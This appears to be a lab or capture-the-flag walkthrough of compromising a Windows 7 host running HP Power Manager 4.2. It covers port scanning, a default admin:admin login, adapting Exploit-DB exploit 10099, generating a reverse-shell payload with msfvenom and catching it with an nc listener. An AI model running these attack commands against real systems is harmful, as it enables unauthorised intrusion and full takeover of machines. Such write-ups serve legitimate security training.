rustscan -a 192.168.152.45 --ulimit 5000
Open 192.168.152.45:80
Open 192.168.152.45:135
Open 192.168.152.45:139
Open 192.168.152.45:445
Open 192.168.152.45:3389
Open 192.168.152.45:3573
Open 192.168.152.45:49153
Open 192.168.152.45:49155
Open 192.168.152.45:49154
Open 192.168.152.45:49152
Open 192.168.152.45:49159
Open 192.168.152.45:49158
From the ports that are open we can tell that we will be attacking a target running Windows (135, 139, 445, 3389)
Lets also run a verbose nmap scan to see if we can gather any data on these open ports
nmap -sCVS 192.168.152.45
Our target is running Windows 7 lol
Lets check these SMB shares, lets see if guest login is allowed with crackmapexec.
Good thing they disabled the guest account.
Lets check the service running on port 80
I have never seen this before but hey, there is no way the login credentials will be admin:admin, right?
Well...
We are in, and some quick research on the site shows that the version of this software can be exploited.
This is an older lab but its cool to see these attacks in action.
Google key search "HP Power Manager 4.2 (Build 7) exploit" and we come across an Exploit-DB page with a juicy exploit we can use on this target:https://www.exploit-db.com/exploits/10099
It looks like we are going to need to modify this script for our needs so we can capture the reverse shell.
The creator of the script utilizes alphanumeric shell code.
This is likely because of the character filtering that is used in the HP Power Manager tool.
We can easily replace this shell code with our own using msfvenom.
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=$IP LPORT=4444 -e x86/alpha_mixed -f c
Note that we got the bad characters we need for this code shell from reading the some of the documentation that the script creator left for us here:
We replace the alphanumeric shell code with out own from the generated output of our msfvenom command.
Now lets run this script and set up a listener
nc -lvnp 4444
python2 10099.py 192.168.152.45
And it looks like we already have root access, no privilege escalation required... sick!